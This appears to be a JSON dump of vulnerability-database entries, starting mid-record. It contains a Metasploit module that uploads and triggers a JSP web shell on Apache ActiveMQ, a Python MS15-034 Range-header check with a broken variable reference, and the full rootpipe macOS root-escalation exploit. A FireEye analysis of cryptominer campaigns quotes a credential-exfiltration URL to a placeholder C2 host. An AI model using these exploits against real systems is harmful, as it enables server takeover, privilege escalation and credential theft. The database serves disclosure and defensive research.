OptString.new('BasicAuthPass', [ true, 'The password for the specified username', 'admin' ]),\r\n OptString.new('JSP', [ false, 'JSP name to use, excluding the .jsp extension (default: random)', nil ]),\r\n OptString.new('AutoCleanup', [ false, 'Remove web shells after callback is received', 'true' ]),\r\n Opt::RPORT(8161)\r\n ])\r\n register_advanced_options(\r\n [\r\n OptString.new('UploadPath', [false, 'Custom directory into which web shells are uploaded', nil])\r\n ])\r\n end\r\n\r\n def jsp_text(payload_name)\r\n %{\r\n <%@ page import=\"java.io.*\"\r\n %><%@ page import=\"java.net.*\"\r\n %><%\r\n URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath(\"./#{payload_name}.jar\")).toURI().toURL()});\r\n Class c = cl.loadClass(\"metasploit.Payload\");\r\n c.getMethod(\"main\",Class.forName(\"[Ljava.lang.String;\")).invoke(null,new java.lang.Object[]{new java.lang.String[0]});\r\n %>}\r\n end\r\n\r\n def exploit\r\n jar_payload = payload.encoded_jar.pack\r\n payload_name = datastore['JSP'] || rand_text_alpha(8 + rand(8))\r\n host = \"#{datastore['RHOST']}:#{datastore['RPORT']}\"\r\n @url = datastore['SSL'] ? \"https://#{host}\" : \"http://#{host}\"\r\n paths = get_upload_paths\r\n paths.each do |path|\r\n if try_upload(path, jar_payload, payload_name)\r\n break handler if trigger_payload(payload_name)\r\n print_error('Unable to trigger payload')\r\n end\r\n end\r\n end\r\n\r\n def try_upload(path, jar_payload, payload_name)\r\n ['.jar', '.jsp'].each do |ext|\r\n file_name = payload_name + ext\r\n data = ext == '.jsp' ? 
jsp_text(payload_name) : jar_payload\r\n move_headers = { 'Destination' => \"#{@url}#{path}#{file_name}\" }\r\n upload_uri = normalize_uri('fileserver', file_name)\r\n print_status(\"Uploading #{move_headers['Destination']}\")\r\n register_files_for_cleanup \"#{path}#{file_name}\" if datastore['AutoCleanup'].casecmp('true')\r\n return error_out unless send_request('PUT', upload_uri, 204, 'data' => data) &&\r\n send_request('MOVE', upload_uri, 204, 'headers' => move_headers)\r\n @trigger_resource = /webapps(.*)/.match(path)[1]\r\n end\r\n true\r\n end\r\n\r\n def get_upload_paths\r\n base_path = \"#{get_install_path}/webapps\"\r\n custom_path = datastore['UploadPath']\r\n return [normalize_uri(base_path, custom_path)] unless custom_path.nil?\r\n [ \"#{base_path}/api/\", \"#{base_path}/admin/\" ]\r\n end\r\n\r\n def get_install_path\r\n properties_page = send_request('GET', \"#{@url}/admin/test/systemProperties.jsp\").body\r\n match = properties_page.tr(\"\\n\", '@').match(/activemq\\.home<\\/td>@\\s*<td>([^@]+)<\\/td>/)\r\n return match[1] unless match.nil?\r\n end\r\n\r\n def send_request(method, uri, expected_response = 200, opts = {})\r\n opts['headers'] ||= {}\r\n opts['headers']['Authorization'] = basic_auth(datastore['BasicAuthUser'], datastore['BasicAuthPass'])\r\n opts['headers']['Connection'] = 'close'\r\n r = send_request_cgi(\r\n {\r\n 'method' => method,\r\n 'uri' => uri\r\n }.merge(opts)\r\n )\r\n return false if r.nil? 
|| expected_response != r.code.to_i\r\n r\r\n end\r\n\r\n def trigger_payload(payload_name)\r\n send_request('POST', @url + @trigger_resource + payload_name + '.jsp')\r\n end\r\n\r\n def error_out\r\n print_error('Upload failed')\r\n @trigger_resource = nil\r\n false\r\n end\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96268", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:32:41", "description": "<h4><strong></strong>\u4e00\u3001\u6f0f\u6d1e\u6982\u8981<strong></strong></h4><p> </p><p>2015\u5e7404\u670814\u65e5\uff0c\u5fae\u8f6f\u53d1\u5e03\u4e25\u91cd\u7ea7\u522b\u7684\u5b89\u5168\u516c\u544a MS15-034\uff0c\u7f16\u53f7\u4e3a CVE-2015-1635\uff0c\u636e\u79f0\u5728 Http.sys \u4e2d\u7684\u6f0f\u6d1e\u53ef\u80fd\u5141\u8bb8\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u3002</p><ul><li><strong> \u6f0f\u6d1e\u63cf\u8ff0</strong></li></ul><p>Http.sys \u662f\u4e00\u4e2a\u4f4d\u4e8e Windows \u64cd\u4f5c\u7cfb\u7edf\u6838\u5fc3\u7ec4\u4ef6\uff0c\u80fd\u591f\u8ba9\u4efb\u4f55\u5e94\u7528\u7a0b\u5e8f\u901a\u8fc7\u5b83\u63d0\u4f9b\u7684\u63a5\u53e3\uff0c\u4ee5 Http \u534f\u8bae\u8fdb\u884c\u4fe1\u606f\u901a\u8baf\u3002\u5fae\u8f6f\u5728 Windows 2003 Server \u91cc\u5f15\u8fdb\u4e86\u65b0\u7684 HTTP API \u548c\u5185\u6838\u6a21\u5f0f\u9a71\u52a8 Http.sys\uff0c\u76ee\u7684\u662f\u4f7f\u57fa\u4e8e Http \u670d\u52a1\u7684\u7a0b\u5e8f\u66f4\u6709\u6548\u7387\u3002\u5176\u5b9e\u5728 Windows XP \u5b89\u88c5 SP2 \u540e\uff0cHttp.sys \u5df2\u7ecf\u51fa\u73b0\u5728\u7cfb\u7edf\u91cc\u4e86\uff0c\u4f46\u4e8b\u5b9e\u4e0a\u64cd\u4f5c\u7cfb\u7edf\u5e76\u6ca1\u6709\u771f\u7684\u4f7f\u7528\u8fd9\u4e2a\u5185\u6838\u7ea7\u9a71\u52a8\uff0c\u800c XP \u4e0a\u81ea\u5e26\u7684 IIS 5.1 \u4e5f\u6ca1\u6709\u4f7f\u7528 HTTP API\u3002</p><p>\u4ece\u66dd\u51fa\u7684 POC 
\u6765\u770b\uff0c\u6b64\u6f0f\u6d1e\u662f\u4e00\u4e2a\u6574\u6570\u6ea2\u51fa\u7c7b\u578b\u7684\u6f0f\u6d1e\uff0c\u5fae\u8f6f\u5b89\u5168\u516c\u544a\u79f0\u6700\u5927\u5b89\u5168\u5f71\u54cd\u662f\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u3002</p><ul><li><strong>\u6f0f\u6d1e\u5f71\u54cd</strong></li></ul><p>\u53d7\u5f71\u54cd\u7248\u672c\uff1a</p><p>IIS 7.0\u4ee5\u4e0a\u7684Windows 7/8/8.1\u548cWindows Server 2008 R2/Server 2012/Server 2012 R2\u7b49\u64cd\u4f5c\u7cfb\u7edf\u3002</p><ul><li><strong>\u6f0f\u6d1e\u5206\u6790</strong></li></ul><p>\u6839\u636e\u8865\u4e01\u6bd4\u8f83\u53d1\u73b0\uff0cPOC \u4e2d\u63d0\u5230\u7684\u4ee3\u7801\u51fa\u73b0\u5728 UlpParseRange \u51fd\u6570\u4e2d\u4fee\u6539\u7684\u90e8\u5206\u3002</p><p>\u5728\u672a\u6253\u8865\u4e01\u7684 Http.sys \u6587\u4ef6\u7684 UlpParseRange \u51fd\u6570\u4e2d\uff0c\u4ee3\u7801\u5982\u4e0b\u3002</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.171.jpg\" alt=\"4.171\" height=\"294\" width=\"358\"></p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.172.jpg\" alt=\"4.172\" height=\"35\" width=\"536\"></p><p>\u53ef\u4ee5\u770b\u5230\uff0c\u5728\u8ba1\u7b97 64 \u4f4d\u6574\u6570\u65f6\u76f4\u63a5\u8fdb\u884c\u4e86\u8fd0\u7b97\uff0c\u6ca1\u6709\u8fdb\u884c\u5fc5\u8981\u7684\u6574\u6570\u6ea2\u51fa\u68c0\u67e5\u3002</p><p>\u800c\u5728\u6253\u8865\u4e01\u7684 Http.sys \u6587\u4ef6\u7684 UlpParseRange \u51fd\u6570\u4e2d\uff0c\u4fee\u6539\u4ee3\u7801\u5982\u4e0b\u3002</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.173.jpg\" alt=\"4.173\" height=\"284\" width=\"340\"></p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.174.jpg\" alt=\"4.174\" height=\"20\" width=\"649\"></p><p>\u7528 RtlULongLongAdd \u51fd\u6570\u6765\u8ba1\u7b97 Range \u8303\u56f4\u957f\u5ea6 v18\uff0c\u8fd9\u4e2a\u51fd\u6570\u4e2d\u662f\u505a\u4e86\u6574\u6570\u6ea2\u51fa\u68c0\u67e5\u7684\u3002</p><p><img 
src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.175.jpg\" alt=\"4.175\" height=\"323\" width=\"792\"></p><p>\u518d\u770b\u4e00\u4e0b\u5bf9 RtlULongLongAdd \u51fd\u6570\u7684\u8c03\u7528\u60c5\u51b5\u3002</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.176.jpg\" alt=\"4.176\" height=\"139\" width=\"690\"></p><p>\u5728\u672a\u6253\u8865\u4e01\u7684 Http.sys \u6587\u4ef6\u4e2d\u53ea\u6709 1 \u5904\u8c03\u7528\u4e86 RtlULongLongAdd \u51fd\u6570\u3002</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.177.jpg\" alt=\"4.177\" height=\"333\" width=\"393\"></p><p>\u800c\u5728\u6253\u8865\u4e01\u7684 Http.sys \u6587\u4ef6\u4e2d\u603b\u5171\u6709 13 \u5904\u8c03\u7528\u4e86 RtlULongLongAdd \u51fd\u6570\u8fdb\u884c\u6574\u6570\u6ea2\u51fa\u68c0\u67e5\uff0c\u8bf4\u660e\u6709\u6f0f\u6d1e\u7684\u7cfb\u7edf\u4e2d\u53ef\u80fd\u6709\u591a\u4e2a\u5904\u7406\u6d41\u7a0b\u4f1a\u6d89\u53ca\u5230\u6574\u6570\u6ea2\u51fa\u9020\u6210\u7684\u5b89\u5168\u95ee\u9898\u3002</p><p>\u901a\u8fc7\u8865\u4e01\u6bd4\u8f83\u786e\u5b9a\u4e86\u4fee\u6539\u8fc7\u7684\u51fd\u6570\u5982\u4e0b\u3002</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.178.jpg\" alt=\"4.178\" height=\"202\" width=\"701\"></p><p>\u7ecf\u8fc7\u5206\u6790\u53d1\u73b0\uff0cUlAdjustRangesToContentSize \u51fd\u6570\u4e2d\u7684\u6574\u6570\u6ea2\u51fa\u70b9\uff0c\u624d\u662f\u5bfc\u81f4\u6f0f\u6d1e\u80fd\u53d1\u6325\u4f5c\u7528\u7684\u5173\u952e\u6d41\u7a0b\u3002</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.179.jpg\" alt=\"4.179\" height=\"295\" width=\"452\"></p><p> </p><p>\u8fd9\u6bb5\u4ee3\u7801\u8fd8\u662f\u91c7\u7528\u4e86\u76f4\u63a5\u8fd0\u7b97 64 \u4f4d\u6574\u6570\u7684\u65b9\u5f0f\uff0c\u6ca1\u6709\u68c0\u67e5\u662f\u5426\u6ea2\u51fa\uff0c\u5728\u8865\u4e01\u6587\u4ef6\u4e2d\u66ff\u6362\u4e3a\u8c03\u7528 RtlULongLongAdd 
\u51fd\u6570\u3002</p><p>\u8fd9\u90e8\u5206\u4ee3\u7801\u7684\u529f\u80fd\u662f\u5224\u65ad\u83b7\u53d6\u6587\u4ef6\u504f\u79fb\u91cf\u7684\u8303\u56f4\uff0c\u662f\u5426\u4f1a\u8d85\u8fc7\u8bf7\u6c42\u7f13\u5b58\u6587\u4ef6\u7684\u6570\u636e\u957f\u5ea6\uff0c\u5982\u679c\u8d85\u51fa\u5c31\u628a\u8bfb\u53d6\u957f\u5ea6 \u4fee\u6539\u4e3a\u5408\u9002\u7684\u5927\u5c0f\uff0c\u9632\u6b62\u8d8a\u754c\u8bbf\u95ee\u6570\u636e\u3002\u4f46\u662f\u7531\u4e8e\u53d1\u751f\u4e86\u6574\u6570\u6ea2\u51fa\uff0c\u4f7f\u5f97\u5224\u65ad\u8d8a\u754c\u7684\u4ee3\u7801\u5931\u6548\uff0c\u8fd9\u6837\u5c31\u4e0d\u4f1a\u4fee\u6539\u8bfb\u53d6\u957f\u5ea6\uff0c\u9020\u6210\u7528\u53ef\u63a7\u7684\u957f\u5ea6\u503c\u8d8a\u754c\u8bbf\u95ee\u6570\u636e\u3002</p><p>\u4f46\u662f\u5982\u679c\u8981\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u8fd8\u9700\u8981\u4e00\u4e9b\u5fc5\u8981\u7684\u6761\u4ef6\uff0c\u5177\u4f53\u7ec6\u8282\u6709\u5f85\u8fdb\u4e00\u6b65\u5206\u6790\u3002</p><ul><li><strong>\u6f0f\u6d1e\u9a8c\u8bc1</strong></li></ul><p>\u53ef\u4ee5\u4f7f\u7528 PoC \u533a\u57df\u4e2d Python \u7a0b\u5e8f\u5bf9\u7cfb\u7edf\u8fdb\u884c\u6f0f\u6d1e\u68c0\u6d4b\u3002</p><p>\u5982\u679c\u6253\u5370\u51fa\u201cLooks VULN\u201d\uff0c\u8bf4\u660e\u7cfb\u7edf\u5b58\u5728\u6f0f\u6d1e\u3002</p><h4><strong></strong>\u4e8c\u3001ZoomEye \u5e94\u6025\u6982\u8981<strong></strong></h4><p> </p><p>\u77e5\u9053\u521b\u5b87\u5b89\u5168\u7814\u7a76\u56e2\u961f\u901a\u8fc7\u7f51\u7edc\u7a7a\u95f4\u641c\u7d22\u5f15\u64ce ZoomEye \u8fdb\u884c\u5168\u7f51\u641c\u7d22\uff0c\u5f97\u51fa\u76ee\u524d\u7f51\u7edc\u7a7a\u95f4\u4e2d\u53ef\u80fd\u53d7\u5f71\u54cd\u7f51\u7ad9\u6240\u4f7f\u7528 IIS \u7248\u672c\u6bd4\u4f8b\u5982\u4e0b\u6240\u793a\uff1a</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.16%E9%85%8D%E5%9B%BE1.png\" alt=\"4.16\u914d\u56fe1\" height=\"323\" width=\"575\"></p><p> </p><p>\u25b2\u53d7\u5a01\u80c1\u7f51\u7ad9\u4f7f\u7528\u7248\u672c\u6bd4\u4f8b</p><p><img 
src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.16%E9%85%8D%E5%9B%BE2.png\" alt=\"4.16\u914d\u56fe2\" height=\"509\" width=\"672\"></p><p>\u25b2\u5168\u56fd\u7f51\u7ad9\u53d7 IIS \u6f0f\u6d1e\u5f71\u54cd\u5730\u57df\u5206\u5e03\u60c5\u51b5</p><p>\u53e6\u5916\uff0cZoomEye \u641c\u7d22\u7ed3\u679c\u663e\u793a\uff0c\u5168\u56fd\u53d7\u6f0f\u6d1e\u5a01\u80c1\u7684\u7f51\u7ad9\u603b\u6570\u8fbe 795,317 \u4e2a\uff0c\u8d85\u8fc7\u6211\u56fd\u7f51\u7ad9\u603b\u6570\u7684\u4e94\u5206\u4e4b\u4e00\uff0c\u4ece\u533a\u57df\u5206\u5e03\u6765\u770b\uff0c\u6392\u5728\u9996\u4f4d\u7684\u5317\u4eac\u5730\u533a\u5171 276,39 \u4e2a\uff0c\u5bf9\u6f0f\u6d1e\u7684\u4fee\u590d\u5de5\u4f5c\u523b\u4e0d\u5bb9\u7f13\u3002\u8bf7\u7f51\u7edc\u7ba1\u7406\u5458\u5c3d\u5feb\u6253\u8865\u4e01\u4fee\u590d\uff0c\u5b98\u65b9\u8865\u4e01\u4e0b\u8f7d\u5730\u5740\uff1a</p><ul><li><a href=\"https://support.microsoft.com/zh-cn/kb/3042553\">https://support.microsoft.com/zh-cn/kb/3042553</a>\u3002</li></ul><h4>\u4e09\u3001\u4fee\u590d\u5efa\u8bae</h4><p>\u901a\u8fc7 Windows \u66f4\u65b0\u673a\u5236\uff0c\u9009\u62e9 KB3042553 \u5b89\u5168\u66f4\u65b0\u8fdb\u884c\u7cfb\u7edf\u5347\u7ea7\u3002</p><p>\u6b64\u6f0f\u6d1e\u5728\u7ebf\u9a8c\u8bc1\u5730\u5740\uff1a<a href=\"http://www.scanv.com/lab\" target=\"_blank\">http://www.scanv.com/lab</a></p><h4><strong></strong>\u56db\u3001\u76f8\u5173\u8d44\u6e90\u94fe\u63a5<strong></strong></h4><ul><li><a href=\"https://technet.microsoft.com/zh-cn/library/security/ms15-034\">https://technet.microsoft.com/zh-cn/library/security/ms15-034</a></li></ul><p>\u5e94\u6025\u62a5\u544a\u4e0b\u8f7d\uff1a<a target=\"_blank\" href=\"http://blog.knownsec.com/wp-content/uploads/2015/04/IIS%E7%B3%BB%E5%88%97Http.sys%E5%A4%84%E7%90%86Range%E6%95%B4%E6%95%B0%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E-%E5%BA%94%E6%80%A5%E5%88%86%E6%9E%90%E6%8A%A5%E5%91%8AV1-.pdf\">IIS\u7cfb\u5217Http.sys\u5904\u7406Range\u6574\u6570\u6ea2\u51fa\u6f0f\u6d1e 
\u5e94\u6025\u5206\u6790\u62a5\u544aV1</a><br></p>", "cvss3": {}, "published": "2015-07-01T00:00:00", "type": "seebug", "title": "IIS \u7cfb\u5217 Http.sys \u5904\u7406 Range \u6574\u6570\u6ea2\u51fa\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1635"], "modified": "2015-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89233", "id": "SSV:89233", "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\n\r\nimport socket\r\nimport random\r\nfrom urlparse import urljoin\r\nfrom pocsuite.net import req\r\nfrom pocsuite.poc import POCBase, Output\r\nfrom pocsuite.utils import register\r\nfrom lib.utils.funs import url2ip\r\n\r\n\r\nclass TestPOC(POCBase):\r\n vulID = '89233' # vul ID\r\n version = '1'\r\n author = ['cnyql']\r\n vulDate = '2015-04-14'\r\n createDate = '2015-04-16'\r\n updateDate = '2015-09-19'\r\n references = ['http://www.sebug.net/vuldb/ssvid-89233']\r\n name = 'IIS \u7cfb\u5217 Http.sys \u5904\u7406 Range \u6574\u6570\u6ea2\u51fa\u6f0f\u6d1e'\r\n appPowerLink = 'http://www.iis.net/'\r\n appName = 'Miscrosoft IIS httpd'\r\n appVersion = 'N/A'\r\n vulType = 'Buffer Overflow'\r\n desc = '''\r\n 2015\u5e7404\u670814\u65e5\uff0c\u5fae\u8f6f\u53d1\u5e03\u4e25\u91cd\u7ea7\u522b\u7684\u5b89\u5168\u516c\u544a MS15-034\uff0c\u7f16\u53f7\u4e3a CVE-2015-1635\uff0c\u636e\u79f0\u5728 Http.sys \u4e2d\u7684\u6f0f\u6d1e\u53ef\u80fd\u5141\u8bb8\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u3002\r\n '''\r\n\r\n def _verify(self):\r\n\r\n ip = url2ip(self.url)\r\n hexAllFfff = \"18446744073709551615\"\r\n flag = False\r\n req1 = \"GET /HTTP/1.0\\r\\n\\r\\n\"\r\n req = \"GET /HTTP/1.1\\r\\nHost: stuff\\r\\nRange: bytes=0-\" + hexAllFfff + \"\\r\\n\\r\\n\"\r\n\r\n client_socket =socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n client_socket.connect((ip, 80))\r\n client_socket.send(req1)\r\n boringResp = client_socket.recv(1024)\r\n\r\n if \"Microsoft\" in boringResp:\r\n client_socket.close()\r\n client_socket = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n client_socket.connect((ip,80))\r\n client_socket.send(req)\r\n goodResp = client_socket.recv(1024)\r\n\r\n if \"Requested RangeNot Satisfiable\" in goodResp:\r\n flag = True\r\n\r\n return self.parse_verify(flag)\r\n\r\n def parse_verify(self, flag):\r\n output = Output(self)\r\n result = {}\r\n\r\n if flag:\r\n result['VerifyInfo'] = {}\r\n result['VerifyInfo']['URL'] = res.url\r\n output.success(result)\r\n \r\n else:\r\n output.fail('No vulnerability found.')\r\n\r\n return output\r\n\t\t\r\n def _attack(self):\r\n return self._verify()\r\n\r\n\r\nregister(TestPOC)\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-89233", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:29:20", "description": "<p>\u6f0f\u6d1e\u540d\u79f0:Apple OS X Admin Framework \u5b89\u5168\u6f0f\u6d1e<br></p><p>\u7d27\u6025\u7a0b\u5ea6:\u9ad8\u5371<br></p><p>\u6f0f\u6d1e\u7c7b\u578b: \u672c\u5730\u63d0\u6743<br></p><p>\u8be6\u7ec6\u4fe1\u606f\uff1a</p><p>Apple OS X\u662f\u7f8e\u56fd\u82f9\u679c\uff08Apple\uff09\u516c\u53f8\u4e3aMac\u8ba1\u7b97\u673a\u6240\u5f00\u53d1\u7684\u4e00\u5957\u4e13\u7528\u64cd\u4f5c\u7cfb\u7edf\u3002</p><p>Apple OS X 10.10.2\u53ca\u4e4b\u524d\u7248\u672c\u7684Admin Framework\u4e2d\u7684XPC\u5b9e\u73b0\u8fc7\u7a0b\u4e2d\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\u672c\u5730\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u7ed5\u8fc7\u8eab\u4efd\u9a8c\u8bc1\uff0c\u83b7\u53d6\u7ba1\u7406\u5458\u6743\u9650\u3002</p><div class=\"simditor-table\"><br></div>", "cvss3": {}, "published": "2015-09-10T00:00:00", "type": "seebug", "title": "Mac OS X < 10.7.5, 10.8.2, 10.9.5 10.10.2 - rootpipe \u672c\u5730\u63d0\u6743\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1130"], "modified": "2015-09-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89389", "id": "SSV:89389", "sourceData": "\n 
########################################################\r\n#\r\n# PoC exploit code for rootpipe (CVE-2015-1130)\r\n#\r\n# Created by Emil Kvarnhammar, TrueSec\r\n#\r\n# Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2\r\n#\r\n########################################################\r\nimport os\r\nimport sys\r\nimport platform\r\nimport re\r\nimport ctypes\r\nimport objc\r\nimport sys\r\nfrom Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions\r\nfrom Foundation import NSAutoreleasePool\r\n \r\ndef load_lib(append_path):\r\n return ctypes.cdll.LoadLibrary(\"/System/Library/PrivateFrameworks/\" + append_path);\r\n \r\ndef use_old_api():\r\n return re.match(\"^(10.7|10.8)(.\\d)?$\", platform.mac_ver()[0])\r\n \r\n \r\nargs = sys.argv\r\n \r\nif len(args) != 3:\r\n print \"usage: exploit.py source_binary dest_binary_as_root\"\r\n sys.exit(-1)\r\n \r\nsource_binary = args[1]\r\ndest_binary = os.path.realpath(args[2])\r\n \r\nif not os.path.exists(source_binary):\r\n raise Exception(\"file does not exist!\")\r\n \r\npool = NSAutoreleasePool.alloc().init()\r\n \r\nattr = NSMutableDictionary.alloc().init()\r\nattr.setValue_forKey_(04777, NSFilePosixPermissions)\r\ndata = NSData.alloc().initWithContentsOfFile_(source_binary)\r\n \r\nprint \"will write file\", dest_binary\r\n \r\nif use_old_api():\r\n adm_lib = load_lib(\"/Admin.framework/Admin\")\r\n Authenticator = objc.lookUpClass(\"Authenticator\")\r\n ToolLiaison = objc.lookUpClass(\"ToolLiaison\")\r\n SFAuthorization = objc.lookUpClass(\"SFAuthorization\")\r\n \r\n authent = Authenticator.sharedAuthenticator()\r\n authref = SFAuthorization.authorization()\r\n \r\n # authref with value nil is not accepted on OS X <= 10.8\r\n authent.authenticateUsingAuthorizationSync_(authref)\r\n st = ToolLiaison.sharedToolLiaison()\r\n tool = st.tool()\r\n tool.createFileWithContents_path_attributes_(data, dest_binary, attr)\r\nelse:\r\n adm_lib = load_lib(\"/SystemAdministration.framework/SystemAdministration\")\r\n 
WriteConfigClient = objc.lookUpClass(\"WriteConfigClient\")\r\n client = WriteConfigClient.sharedClient()\r\n client.authenticateUsingAuthorizationSync_(None)\r\n tool = client.remoteProxy()\r\n \r\n tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)\r\n \r\n \r\nprint \"Done!\"\r\n \r\ndel pool\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-89389", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2021-11-04T00:24:47", "description": "#### Introduction\n\nFireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.\n\nCVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.\n\nFireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.\n\nWe saw evidence of organizations located in various countries \u2013 including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical \u2013 being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. 
This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.\n\nThe recent cryptocurrency boom has resulted in a growing number of operations \u2013 employing diverse tactics \u2013 aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.\n\n#### Tactic #1: Delivering the miner directly to a vulnerable server\n\nSome tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1), and executing it using ShellExecute().\n\n \nFigure 1: Downloading the payload directly\n\n#### Tactic #2: Utilizing PowerShell scripts to deliver the miner\n\nOther tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).\n\n \nFigure 2: Exploit delivering PowerShell script\n\nThis script has the following functionalities:\n\n * **Downloading miners from remote servers**\n\n \nFigure 3: Downloading cryptominers\n\nAs shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.\n\n * **Creating scheduled tasks for persistence**\n\n \nFigure 4: Creation of scheduled task\n\n * **Deleting scheduled tasks of other known cryptominers**\n\n \nFigure 5: Deletion of scheduled tasks related to other miners\n\nIn Figure 4, the cryptominer creates a scheduled task with name \u201c_Update service for Oracle products1_\u201d. In Figure 5, a different variant deletes this task and other similar tasks after creating its own, \u201c_Update service for Oracle productsa_\u201d. 
\n\nFrom this, it\u2019s quite clear that different attackers are fighting over the resources available in the system.\n\n * **Killing processes matching certain strings associated with other cryptominers**\n\n \nFigure 6: Terminating processes directly\n\n \nFigure 7: Terminating processes matching certain strings\n\nSimilar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).\n\n * **Connects to mining pools with wallet key**\n\n \nFigure 8: Connection to mining pools\n\nThe miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.\n\n * **Limiting CPU usage to avoid suspicion**\n\n \nFigure 9: Limiting CPU Usage\n\nTo avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).\n\n#### Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue\n\nSome tactics involve spreading laterally across a victim\u2019s environment using dumped Windows credentials and the [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) vulnerability ([CVE-2017-0144](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)).\n\nThe malware checks whether it\u2019s running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. 
This variant maintains persistence via WMI (Windows Management Instrumentation).\n\nThe malware also has the capability to perform a [Pass-the-Hash](<https://en.wikipedia.org/wiki/Pass_the_hash>) attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.\n\nAdditionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.\n\nIf the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if it\u2019s vulnerable to EternalBlue, and uses it to spread to that host.\n\nAfter all network-derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.\n\n#### Tactic #4: Scenarios observed in Linux OS\n\nWe\u2019ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.\n\n \nFigure 10: Delivery of shell scripts\n\nThe shell script performs the following activities:\n\n * **Attempts to kill already running cryptominers**\n\n \nFigure 11: Terminating processes matching certain strings\n\n * **Downloads and executes cryptominer malware**\n\n \nFigure 12: Downloading CryptoMiner\n\n * **Creates a cron job to maintain persistence**\n\n \nFigure 13: Cron job for persistence\n\n * **Tries to kill other potential miners to hog the CPU usage**\n\n \nFigure 14: Terminating other potential miners\n\nThe function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.\n\n#### Conclusion\n\nUse of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. 
